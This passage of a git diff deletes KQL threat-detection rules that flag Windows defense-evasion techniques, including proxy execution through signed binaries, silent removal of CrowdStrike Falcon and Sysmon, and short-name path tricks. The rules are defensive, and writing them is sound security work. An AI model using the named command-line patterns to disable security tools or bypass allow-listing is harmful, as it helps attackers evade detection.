Evasion/UEFI_Persistence_Via_Wpbbin_-_ProcessCreation.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/07/18 -// Level: high -// Description: Detects execution of the binary "wpbbin" which is used as part of the UEFI based persistence method described in the reference section -// Tags: attack.persistence, attack.defense_evasion, attack.t1542.001 -DeviceProcessEvents -| where FolderPath =~ "C:\\Windows\\System32\\wpbbin.exe" \ No newline at end of file diff --git a/Defense Evasion/Uncommon_AddinUtil.EXE_CommandLine_Execution.kql b/Defense Evasion/Uncommon_AddinUtil.EXE_CommandLine_Execution.kql deleted file mode 100644 index 6ef2677f..00000000 --- a/Defense Evasion/Uncommon_AddinUtil.EXE_CommandLine_Execution.kql +++ /dev/null @@ -1,8 +0,0 @@ -// Author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri) -// Date: 2023/09/18 -// Level: medium -// Description: Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) with uncommon Addinroot or Pipelineroot paths. An adversary may execute AddinUtil.exe with uncommon Addinroot/Pipelineroot paths that point to the adversaries Addins.Store payload. - -// Tags: attack.defense_evasion, attack.t1218 -DeviceProcessEvents -| where ((ProcessCommandLine contains "-AddInRoot:" or ProcessCommandLine contains "-PipelineRoot:") and (FolderPath endswith "\\addinutil.exe" or ProcessVersionInfoOriginalFileName =~ "AddInUtil.exe")) and (not((ProcessCommandLine contains "-AddInRoot:\"C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTA" or ProcessCommandLine contains "-AddInRoot:C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTA" or ProcessCommandLine contains "-PipelineRoot:\"C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTA" or ProcessCommandLine contains "-PipelineRoot:C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTA"))) \ No newline at end of file diff --git a/Defense Evasion/Uncommon_Child_Process_Of_AddinUtil.EXE.kql b/Defense Evasion/Uncommon_Child_Process_Of_AddinUtil.EXE.kql deleted file mode 100644 index 6ee88ff8..00000000 --- a/Defense Evasion/Uncommon_Child_Process_Of_AddinUtil.EXE.kql +++ /dev/null @@ -1,8 +0,0 @@ -// Author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri) -// Date: 2023/09/18 -// Level: medium -// Description: Detects uncommon child processes of the Add-In deployment cache updating utility (AddInutil.exe) which could be a sign of potential abuse of the binary to proxy execution via a custom Addins.Store payload. - -// Tags: attack.defense_evasion, attack.t1218 -DeviceProcessEvents -| where InitiatingProcessFolderPath endswith "\\addinutil.exe" and (not((FolderPath endswith ":\\Windows\\System32\\conhost.exe" or FolderPath endswith ":\\Windows\\System32\\werfault.exe" or FolderPath endswith ":\\Windows\\SysWOW64\\werfault.exe"))) \ No newline at end of file diff --git a/Defense Evasion/Uncommon_Child_Process_Of_Appvlp.EXE.kql b/Defense Evasion/Uncommon_Child_Process_Of_Appvlp.EXE.kql deleted file mode 100644 index b28bbd12..00000000 --- a/Defense Evasion/Uncommon_Child_Process_Of_Appvlp.EXE.kql +++ /dev/null @@ -1,11 +0,0 @@ -// Author: Sreeman -// Date: 2020/03/13 -// Level: medium -// Description: Detects uncommon child processes of Appvlp.EXE -Appvlp or the Application Virtualization Utility is included with Microsoft Office. Attackers are able to abuse "AppVLP" to execute shell commands. -Normally, this binary is used for Application Virtualization, but it can also be abused to circumvent the ASR file path rule folder -or to mark a file as a system file. - -// Tags: attack.t1218, attack.defense_evasion, attack.execution -DeviceProcessEvents -| where InitiatingProcessFolderPath endswith "\\appvlp.exe" and (not((FolderPath endswith ":\\Windows\\SysWOW64\\rundll32.exe" or FolderPath endswith ":\\Windows\\System32\\rundll32.exe"))) and (not(((FolderPath contains ":\\Program Files\\Microsoft Office" and FolderPath endswith "\\msoasb.exe") or (FolderPath contains ":\\Program Files\\Microsoft Office" and FolderPath endswith "\\MSOUC.EXE") or ((FolderPath contains ":\\Program Files\\Microsoft Office" and FolderPath contains "\\SkypeSrv\\") and FolderPath endswith "\\SKYPESERVER.EXE")))) \ No newline at end of file diff --git a/Defense Evasion/Uncommon_Child_Process_Of_BgInfo.EXE.kql b/Defense Evasion/Uncommon_Child_Process_Of_BgInfo.EXE.kql deleted file mode 100644 index 77dfd04d..00000000 --- a/Defense Evasion/Uncommon_Child_Process_Of_BgInfo.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), Beyu Denis, oscd.community -// Date: 2019/10/26 -// Level: medium -// Description: Detects uncommon child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript -// Tags: attack.execution, attack.t1059.005, attack.defense_evasion, attack.t1218, attack.t1202 -DeviceProcessEvents -| where InitiatingProcessFolderPath endswith "\\bginfo.exe" or InitiatingProcessFolderPath endswith "\\bginfo64.exe" \ No newline at end of file diff --git a/Defense Evasion/Uncommon_Child_Process_Of_Defaultpack.EXE.kql b/Defense Evasion/Uncommon_Child_Process_Of_Defaultpack.EXE.kql deleted file mode 100644 index 43fcebb7..00000000 --- a/Defense Evasion/Uncommon_Child_Process_Of_Defaultpack.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/12/31 -// Level: medium -// Description: Detects uncommon child processes of "DefaultPack.EXE" binary as a proxy to launch other programs -// Tags: attack.t1218, attack.defense_evasion, attack.execution -DeviceProcessEvents -| where InitiatingProcessFolderPath endswith "\\DefaultPack.exe" \ No newline at end of file diff --git a/Defense Evasion/Uncommon_Child_Process_Spawned_By_Odbcconf.EXE.kql b/Defense Evasion/Uncommon_Child_Process_Spawned_By_Odbcconf.EXE.kql deleted file mode 100644 index 0ea3864c..00000000 --- a/Defense Evasion/Uncommon_Child_Process_Spawned_By_Odbcconf.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Harjot Singh @cyb3rjy0t -// Date: 2023/05/22 -// Level: medium -// Description: Detects an uncommon child process of "odbcconf.exe" binary which normally shouldn't have any child processes. -// Tags: attack.defense_evasion, attack.t1218.008 -DeviceProcessEvents -| where InitiatingProcessFolderPath endswith "\\odbcconf.exe" \ No newline at end of file diff --git a/Defense Evasion/Uncommon_Extension_In_Keyboard_Layout_IME_File_Registry_Value.kql b/Defense Evasion/Uncommon_Extension_In_Keyboard_Layout_IME_File_Registry_Value.kql deleted file mode 100644 index 3f6b0cac..00000000 --- a/Defense Evasion/Uncommon_Extension_In_Keyboard_Layout_IME_File_Registry_Value.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: X__Junior (Nextron Systems) -// Date: 2023/11/21 -// Level: high -// Description: Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message. -Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named "Ime File" with a DLL path. -IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean. - -// Tags: attack.defense_evasion, attack.t1562.001 -DeviceRegistryEvents -| where (RegistryKey contains "\\Control\\Keyboard Layouts" and RegistryKey contains "Ime File") and (not(RegistryValueData endswith ".ime")) \ No newline at end of file diff --git a/Defense Evasion/Uncommon_FileSystem_Load_Attempt_By_Format.com.kql b/Defense Evasion/Uncommon_FileSystem_Load_Attempt_By_Format.com.kql deleted file mode 100644 index 44d89cab..00000000 --- a/Defense Evasion/Uncommon_FileSystem_Load_Attempt_By_Format.com.kql +++ /dev/null @@ -1,8 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/01/04 -// Level: high -// Description: Detects the execution of format.com with an uncommon filesystem selection that could indicate a defense evasion activity in which "format.com" is used to load malicious DLL files or other programs. - -// Tags: attack.defense_evasion -DeviceProcessEvents -| where (ProcessCommandLine contains "/fs:" and FolderPath endswith "\\format.com") and (not((ProcessCommandLine contains "/fs:exFAT" or ProcessCommandLine contains "/fs:FAT" or ProcessCommandLine contains "/fs:NTFS" or ProcessCommandLine contains "/fs:ReFS" or ProcessCommandLine contains "/fs:UDF"))) \ No newline at end of file diff --git a/Defense Evasion/Uncommon_File_Creation_By_Mysql_Daemon_Process.kql b/Defense Evasion/Uncommon_File_Creation_By_Mysql_Daemon_Process.kql deleted file mode 100644 index 141841a4..00000000 --- a/Defense Evasion/Uncommon_File_Creation_By_Mysql_Daemon_Process.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Joseph Kamau -// Date: 2024/05/27 -// Level: high -// Description: Detects the creation of files with scripting or executable extensions by Mysql daemon. -Which could be an indicator of "User Defined Functions" abuse to download malware. - -// Tags: attack.defense_evasion -DeviceFileEvents -| where (InitiatingProcessFolderPath endswith "\\mysqld.exe" or InitiatingProcessFolderPath endswith "\\mysqld-nt.exe") and (FolderPath endswith ".bat" or FolderPath endswith ".dat" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".ps1" or FolderPath endswith ".psm1" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs") \ No newline at end of file diff --git a/Defense Evasion/Uncommon_Microsoft_Office_Trusted_Location_Added.kql b/Defense Evasion/Uncommon_Microsoft_Office_Trusted_Location_Added.kql deleted file mode 100644 index 167db3f4..00000000 --- a/Defense Evasion/Uncommon_Microsoft_Office_Trusted_Location_Added.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/06/21 -// Level: high -// Description: Detects changes to registry keys related to "Trusted Location" of Microsoft Office where the path is set to something uncommon. Attackers might add additional trusted locations to avoid macro security restrictions. -// Tags: attack.defense_evasion, attack.t1112 -DeviceRegistryEvents -| where (RegistryKey contains "Security\\Trusted Locations\\Location" and RegistryKey endswith "\\Path") and (not(((InitiatingProcessFolderPath contains ":\\Program Files\\Microsoft Office\\" or InitiatingProcessFolderPath contains ":\\Program Files (x86)\\Microsoft Office\\") or (InitiatingProcessFolderPath contains ":\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" and InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe")))) and (not((RegistryValueData contains "%APPDATA%\\Microsoft\\Templates" or RegistryValueData contains "%%APPDATA%%\\Microsoft\\Templates" or RegistryValueData contains "%APPDATA%\\Microsoft\\Word\\Startup" or RegistryValueData contains "%%APPDATA%%\\Microsoft\\Word\\Startup" or RegistryValueData contains ":\\Program Files (x86)\\Microsoft Office\\root\\Templates\\" or RegistryValueData contains ":\\Program Files\\Microsoft Office (x86)\\Templates" or RegistryValueData contains ":\\Program Files\\Microsoft Office\\root\\Templates\\" or RegistryValueData contains ":\\Program Files\\Microsoft Office\\Templates\\"))) \ No newline at end of file diff --git a/Defense Evasion/Uncommon_Svchost_Parent_Process.kql b/Defense Evasion/Uncommon_Svchost_Parent_Process.kql deleted file mode 100644 index 34b8d2cc..00000000 --- a/Defense Evasion/Uncommon_Svchost_Parent_Process.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2017/08/15 -// Level: medium -// Description: Detects an uncommon svchost parent process -// Tags: attack.defense_evasion, attack.t1036.005 -DeviceProcessEvents -| where FolderPath endswith "\\svchost.exe" and (not(((InitiatingProcessFolderPath endswith "\\Mrt.exe" or InitiatingProcessFolderPath endswith "\\MsMpEng.exe" or InitiatingProcessFolderPath endswith "\\ngen.exe" or InitiatingProcessFolderPath endswith "\\rpcnet.exe" or InitiatingProcessFolderPath endswith "\\services.exe" or InitiatingProcessFolderPath endswith "\\TiWorker.exe") or (InitiatingProcessFolderPath in~ ("-", "")) or isnull(InitiatingProcessFolderPath)))) \ No newline at end of file diff --git a/Defense Evasion/Uncommon__Assistive_Technology_Applications_Execution_Via_AtBroker.EXE.kql b/Defense Evasion/Uncommon__Assistive_Technology_Applications_Execution_Via_AtBroker.EXE.kql deleted file mode 100644 index ca6bca6f..00000000 --- a/Defense Evasion/Uncommon__Assistive_Technology_Applications_Execution_Via_AtBroker.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Mateusz Wydra, oscd.community -// Date: 2020/10/12 -// Level: medium -// Description: Detects the start of a non built-in assistive technology applications via "Atbroker.EXE". -// Tags: attack.defense_evasion, attack.t1218 -DeviceProcessEvents -| where (ProcessCommandLine contains "start" and (FolderPath endswith "\\AtBroker.exe" or ProcessVersionInfoOriginalFileName =~ "AtBroker.exe")) and (not((ProcessCommandLine contains "animations" or ProcessCommandLine contains "audiodescription" or ProcessCommandLine contains "caretbrowsing" or ProcessCommandLine contains "caretwidth" or ProcessCommandLine contains "colorfiltering" or ProcessCommandLine contains "cursorindicator" or ProcessCommandLine contains "cursorscheme" or ProcessCommandLine contains "filterkeys" or ProcessCommandLine contains "focusborderheight" or ProcessCommandLine contains "focusborderwidth" or ProcessCommandLine contains "highcontrast" or ProcessCommandLine contains "keyboardcues" or ProcessCommandLine contains "keyboardpref" or ProcessCommandLine contains "livecaptions" or ProcessCommandLine contains "magnifierpane" or ProcessCommandLine contains "messageduration" or ProcessCommandLine contains "minimumhitradius" or ProcessCommandLine contains "mousekeys" or ProcessCommandLine contains "Narrator" or ProcessCommandLine contains "osk" or ProcessCommandLine contains "overlappedcontent" or ProcessCommandLine contains "showsounds" or ProcessCommandLine contains "soundsentry" or ProcessCommandLine contains "speechreco" or ProcessCommandLine contains "stickykeys" or ProcessCommandLine contains "togglekeys" or ProcessCommandLine contains "voiceaccess" or ProcessCommandLine contains "windowarranging" or ProcessCommandLine contains "windowtracking" or ProcessCommandLine contains "windowtrackingtimeout" or ProcessCommandLine contains "windowtrackingzorder"))) and (not(ProcessCommandLine contains "Oracle_JavaAccessBridge")) \ No newline at end of file diff --git a/Defense Evasion/Uninstall_Crowdstrike_Falcon_Sensor.kql b/Defense Evasion/Uninstall_Crowdstrike_Falcon_Sensor.kql deleted file mode 100644 index 996ee87c..00000000 --- a/Defense Evasion/Uninstall_Crowdstrike_Falcon_Sensor.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2021/07/12 -// Level: high -// Description: Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon -// Tags: attack.defense_evasion, attack.t1562.001 -DeviceProcessEvents -| where ProcessCommandLine contains "\\WindowsSensor.exe" and ProcessCommandLine contains " /uninstall" and ProcessCommandLine contains " /quiet" \ No newline at end of file diff --git a/Defense Evasion/Uninstall_Sysinternals_Sysmon.kql b/Defense Evasion/Uninstall_Sysinternals_Sysmon.kql deleted file mode 100644 index 7d3b2fa9..00000000 --- a/Defense Evasion/Uninstall_Sysinternals_Sysmon.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/01/12 -// Level: high -// Description: Detects the removal of Sysmon, which could be a potential attempt at defense evasion -// Tags: attack.defense_evasion, attack.t1562.001 -DeviceProcessEvents -| where (ProcessCommandLine contains "-u" or ProcessCommandLine contains "/u") and ((FolderPath endswith "\\Sysmon64.exe" or FolderPath endswith "\\Sysmon.exe") or ProcessVersionInfoFileDescription =~ "System activity monitor") \ No newline at end of file diff --git a/Defense Evasion/Unmount_Share_Via_Net.EXE.kql b/Defense Evasion/Unmount_Share_Via_Net.EXE.kql deleted file mode 100644 index db69455f..00000000 --- a/Defense Evasion/Unmount_Share_Via_Net.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: oscd.community, @redcanary, Zach Stanford @svch0st -// Date: 2020/10/08 -// Level: low -// Description: Detects when when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation -// Tags: attack.defense_evasion, attack.t1070.005 -DeviceProcessEvents -| where (ProcessCommandLine contains "share" and ProcessCommandLine contains "/delete") and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe"))) \ No newline at end of file diff --git a/Defense Evasion/Unsigned_AppX_Installation_Attempt_Using_Add-AppxPackage.kql b/Defense Evasion/Unsigned_AppX_Installation_Attempt_Using_Add-AppxPackage.kql deleted file mode 100644 index 61f33107..00000000 --- a/Defense Evasion/Unsigned_AppX_Installation_Attempt_Using_Add-AppxPackage.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/01/31 -// Level: medium -// Description: Detects usage of the "Add-AppxPackage" or it's alias "Add-AppPackage" to install unsigned AppX packages -// Tags: attack.persistence, attack.defense_evasion -DeviceProcessEvents -| where (ProcessCommandLine contains "Add-AppPackage " or ProcessCommandLine contains "Add-AppxPackage ") and ProcessCommandLine contains " -AllowUnsigned" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) \ No newline at end of file diff --git a/Defense Evasion/Use_Icacls_to_Hide_File_to_Everyone.kql b/Defense Evasion/Use_Icacls_to_Hide_File_to_Everyone.kql deleted file mode 100644 index a0050001..00000000 --- a/Defense Evasion/Use_Icacls_to_Hide_File_to_Everyone.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/07/18 -// Level: medium -// Description: Detect use of icacls to deny access for everyone in Users folder sometimes used to hide malicious files -// Tags: attack.defense_evasion, attack.t1564.001 -DeviceProcessEvents -| where (ProcessCommandLine contains "/deny" and ProcessCommandLine contains "S-1-1-0:") and (ProcessVersionInfoOriginalFileName =~ "iCACLS.EXE" or FolderPath endswith "\\icacls.exe") \ No newline at end of file diff --git a/Defense Evasion/Use_NTFS_Short_Name_in_Command_Line.kql b/Defense Evasion/Use_NTFS_Short_Name_in_Command_Line.kql deleted file mode 100644 index 5cf32ab1..00000000 --- a/Defense Evasion/Use_NTFS_Short_Name_in_Command_Line.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113, Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/08/05 -// Level: medium -// Description: Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection -// Tags: attack.defense_evasion, attack.t1564.004 -DeviceProcessEvents -| where (ProcessCommandLine contains "~1.exe" or ProcessCommandLine contains "~1.bat" or ProcessCommandLine contains "~1.msi" or ProcessCommandLine contains "~1.vbe" or ProcessCommandLine contains "~1.vbs" or ProcessCommandLine contains "~1.dll" or ProcessCommandLine contains "~1.ps1" or ProcessCommandLine contains "~1.js" or ProcessCommandLine contains "~1.hta" or ProcessCommandLine contains "~2.exe" or ProcessCommandLine contains "~2.bat" or ProcessCommandLine contains "~2.msi" or ProcessCommandLine contains "~2.vbe" or ProcessCommandLine contains "~2.vbs" or ProcessCommandLine contains "~2.dll" or ProcessCommandLine contains "~2.ps1" or ProcessCommandLine contains "~2.js" or ProcessCommandLine contains "~2.hta") and (not(((InitiatingProcessFolderPath endswith "\\WebEx\\WebexHost.exe" or InitiatingProcessFolderPath endswith "\\thor\\thor64.exe") or ProcessCommandLine contains "C:\\xampp\\vcredist\\VCREDI~1.EXE"))) \ No newline at end of file diff --git a/Defense Evasion/Use_NTFS_Short_Name_in_Image.kql b/Defense Evasion/Use_NTFS_Short_Name_in_Image.kql deleted file mode 100644 index cea6c506..00000000 --- a/Defense Evasion/Use_NTFS_Short_Name_in_Image.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113, Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/08/06 -// Level: medium -// Description: Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image based detection -// Tags: attack.defense_evasion, attack.t1564.004 -DeviceProcessEvents -| where (FolderPath contains "~1.bat" or FolderPath contains "~1.dll" or FolderPath contains "~1.exe" or FolderPath contains "~1.hta" or FolderPath contains "~1.js" or FolderPath contains "~1.msi" or FolderPath contains "~1.ps1" or FolderPath contains "~1.tmp" or FolderPath contains "~1.vbe" or FolderPath contains "~1.vbs" or FolderPath contains "~2.bat" or FolderPath contains "~2.dll" or FolderPath contains "~2.exe" or FolderPath contains "~2.hta" or FolderPath contains "~2.js" or FolderPath contains "~2.msi" or FolderPath contains "~2.ps1" or FolderPath contains "~2.tmp" or FolderPath contains "~2.vbe" or FolderPath contains "~2.vbs") and (not(InitiatingProcessFolderPath =~ "C:\\Windows\\explorer.exe")) and (not((InitiatingProcessFolderPath endswith "\\thor\\thor64.exe" or FolderPath endswith "\\VCREDI~1.EXE" or InitiatingProcessFolderPath endswith "\\WebEx\\WebexHost.exe" or FolderPath =~ "C:\\PROGRA~1\\WinZip\\WZPREL~1.EXE"))) \ No newline at end of file diff --git a/Defense Evasion/Use_Of_The_SFTP.EXE_Binary_As_A_LOLBIN.kql b/Defense Evasion/Use_Of_The_SFTP.EXE_Binary_As_A_LOLBIN.kql deleted file mode 100644 index 827d695b..00000000 --- a/Defense Evasion/Use_Of_The_SFTP.EXE_Binary_As_A_LOLBIN.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/11/10 -// Level: medium -// Description: Detects the usage of the "sftp.exe" binary as a LOLBIN by abusing the "-D" flag -// Tags: attack.defense_evasion, attack.execution, attack.t1218 -DeviceProcessEvents -| where (ProcessCommandLine contains " -D .." or ProcessCommandLine contains " -D C:\\") and FolderPath endswith "\\sftp.exe" \ No newline at end of file diff --git a/Defense Evasion/Use_Short_Name_Path_in_Command_Line.kql b/Defense Evasion/Use_Short_Name_Path_in_Command_Line.kql deleted file mode 100644 index 23a837f9..00000000 --- a/Defense Evasion/Use_Short_Name_Path_in_Command_Line.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113, Nasreddine Bencherchali -// Date: 2022/08/07 -// Level: medium -// Description: Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection -// Tags: attack.defense_evasion, attack.t1564.004 -DeviceProcessEvents -| where (ProcessCommandLine contains "~1\\" or ProcessCommandLine contains "~2\\") and (not(((InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\Dism.exe", "C:\\Windows\\System32\\cleanmgr.exe", "C:\\Program Files\\GPSoftware\\Directory Opus\\dopus.exe")) or (InitiatingProcessFolderPath endswith "\\WebEx\\WebexHost.exe" or InitiatingProcessFolderPath endswith "\\thor\\thor64.exe" or InitiatingProcessFolderPath endswith "\\veam.backup.shell.exe" or InitiatingProcessFolderPath endswith "\\winget.exe" or InitiatingProcessFolderPath endswith "\\Everything\\Everything.exe") or InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\WinGet\\" or (ProcessCommandLine contains "\\appdata\\local\\webex\\webex64\\meetings\\wbxreport.exe" or ProcessCommandLine contains "C:\\Program Files\\Git\\post-install.bat" or ProcessCommandLine contains "C:\\Program Files\\Git\\cmd\\scalar.exe")))) \ No newline at end of file diff --git a/Defense Evasion/Use_Short_Name_Path_in_Image.kql b/Defense Evasion/Use_Short_Name_Path_in_Image.kql deleted file mode 100644 index 0ff162d4..00000000 --- a/Defense Evasion/Use_Short_Name_Path_in_Image.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113, Nasreddine Bencherchali -// Date: 2022/08/07 -// Level: medium -// Description: Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image detection -// Tags: attack.defense_evasion, attack.t1564.004 -DeviceProcessEvents -| where (FolderPath contains "~1\\" or FolderPath contains "~2\\") and (not((((InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\Dism.exe", "C:\\Windows\\System32\\cleanmgr.exe")) or (InitiatingProcessFolderPath endswith "\\WebEx\\WebexHost.exe" or InitiatingProcessFolderPath endswith "\\thor\\thor64.exe") or ProcessVersionInfoProductName =~ "InstallShield (R)" or ProcessVersionInfoFileDescription =~ "InstallShield (R) Setup Engine" or ProcessVersionInfoCompanyName =~ "InstallShield Software Corporation") or ((FolderPath contains "\\AppData\\" and FolderPath contains "\\Temp\\") or (FolderPath endswith "~1\\unzip.exe" or FolderPath endswith "~1\\7zG.exe"))))) \ No newline at end of file diff --git a/Defense Evasion/Use_of_Remote.exe.kql b/Defense Evasion/Use_of_Remote.exe.kql deleted file mode 100644 index 58ed2620..00000000 --- a/Defense Evasion/Use_of_Remote.exe.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Christopher Peacock @SecurePeacock, SCYTHE @scythe_io -// Date: 2022/06/02 -// Level: medium -// Description: Remote.exe is part of WinDbg in the Windows SDK and can be used for AWL bypass and running remote files. -// Tags: attack.defense_evasion, attack.t1127 -DeviceProcessEvents -| where FolderPath endswith "\\remote.exe" or ProcessVersionInfoOriginalFileName =~ "remote.exe" \ No newline at end of file diff --git a/Defense Evasion/Use_of_Scriptrunner.exe.kql b/Defense Evasion/Use_of_Scriptrunner.exe.kql deleted file mode 100644 index 0c832c20..00000000 --- a/Defense Evasion/Use_of_Scriptrunner.exe.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/07/01 -// Level: medium -// Description: The "ScriptRunner.exe" binary can be abused to proxy execution through it and bypass possible whitelisting -// Tags: attack.defense_evasion, attack.execution, attack.t1218 -DeviceProcessEvents -| where ProcessCommandLine contains " -appvscript " and (FolderPath endswith "\\ScriptRunner.exe" or ProcessVersionInfoOriginalFileName =~ "ScriptRunner.exe") \ No newline at end of file diff --git a/Defense Evasion/Use_of_Setres.exe.kql b/Defense Evasion/Use_of_Setres.exe.kql deleted file mode 100644 index 8d88bcb7..00000000 --- a/Defense Evasion/Use_of_Setres.exe.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: @gott_cyber -// Date: 2022/12/11 -// Level: medium -// Description: Detects the use of Setres.exe to set the screen resolution and then potentially launch a file named "choice" (with any executable extension such as ".cmd" or ".exe") from the current execution path -// Tags: attack.defense_evasion, attack.t1218, attack.t1202 -DeviceProcessEvents -| where FolderPath endswith "\\choice" and InitiatingProcessFolderPath endswith "\\setres.exe" \ No newline at end of file diff --git a/Defense Evasion/Use_of_TTDInject.exe.kql b/Defense Evasion/Use_of_TTDInject.exe.kql deleted file mode 100644 index c40854dd..00000000 --- a/Defense Evasion/Use_of_TTDInject.exe.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/05/16 -// Level: medium -// Description: Detects the executiob of TTDInject.exe, which is used by Windows 10 v1809 and newer to debug time travel (underlying call of tttracer.exe) -// Tags: attack.defense_evasion, attack.t1127 -DeviceProcessEvents -| where FolderPath endswith "ttdinject.exe" or ProcessVersionInfoOriginalFileName =~ "TTDInject.EXE" \ No newline at end of file diff --git a/Defense Evasion/Use_of_VSIISExeLauncher.exe.kql b/Defense Evasion/Use_of_VSIISExeLauncher.exe.kql deleted file mode 100644 index a392ba2f..00000000 --- a/Defense Evasion/Use_of_VSIISExeLauncher.exe.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/06/09 -// Level: medium -// Description: The "VSIISExeLauncher.exe" binary part of the Visual Studio/VS Code can be used to execute arbitrary binaries -// Tags: attack.defense_evasion, attack.t1127 -DeviceProcessEvents -| where (ProcessCommandLine contains " -p " or ProcessCommandLine contains " -a ") and (FolderPath endswith "\\VSIISExeLauncher.exe" or ProcessVersionInfoOriginalFileName =~ "VSIISExeLauncher.exe") \ No newline at end of file diff --git a/Defense Evasion/Use_of_VisualUiaVerifyNative.exe.kql b/Defense Evasion/Use_of_VisualUiaVerifyNative.exe.kql deleted file mode 100644 index 3179a894..00000000 --- a/Defense Evasion/Use_of_VisualUiaVerifyNative.exe.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Christopher Peacock @SecurePeacock, SCYTHE @scythe_io -// Date: 2022/06/01 -// Level: medium -// Description: VisualUiaVerifyNative.exe is a Windows SDK that can be used for AWL bypass and is listed in Microsoft's recommended block rules. -// Tags: attack.defense_evasion, attack.t1218 -DeviceProcessEvents -| where FolderPath endswith "\\VisualUiaVerifyNative.exe" or ProcessVersionInfoOriginalFileName =~ "VisualUiaVerifyNative.exe" \ No newline at end of file diff --git a/Defense Evasion/Use_of_Wfc.exe.kql b/Defense Evasion/Use_of_Wfc.exe.kql deleted file mode 100644 index b0bfabe4..00000000 --- a/Defense Evasion/Use_of_Wfc.exe.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Christopher Peacock @SecurePeacock, SCYTHE @scythe_io -// Date: 2022/06/01 -// Level: medium -// Description: The Workflow Command-line Compiler can be used for AWL bypass and is listed in Microsoft's recommended block rules. -// Tags: attack.defense_evasion, attack.t1127 -DeviceProcessEvents -| where FolderPath endswith "\\wfc.exe" or ProcessVersionInfoOriginalFileName =~ "wfc.exe" \ No newline at end of file diff --git a/Defense Evasion/Using_SettingSyncHost.exe_as_LOLBin.kql b/Defense Evasion/Using_SettingSyncHost.exe_as_LOLBin.kql deleted file mode 100644 index a0582a37..00000000 --- a/Defense Evasion/Using_SettingSyncHost.exe_as_LOLBin.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Anton Kutepov, oscd.community -// Date: 2020/02/05 -// Level: high -// Description: Detects using SettingSyncHost.exe to run hijacked binary -// Tags: attack.execution, attack.defense_evasion, attack.t1574.008 -DeviceProcessEvents -| where (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\"))) and (InitiatingProcessCommandLine contains "cmd.exe /c" and InitiatingProcessCommandLine contains "RoamDiag.cmd" and InitiatingProcessCommandLine contains "-outputpath") \ No newline at end of file diff --git a/Defense Evasion/UtilityFunctions.ps1_Proxy_Dll.kql b/Defense Evasion/UtilityFunctions.ps1_Proxy_Dll.kql deleted file mode 100644 index 7ffb6536..00000000 --- a/Defense 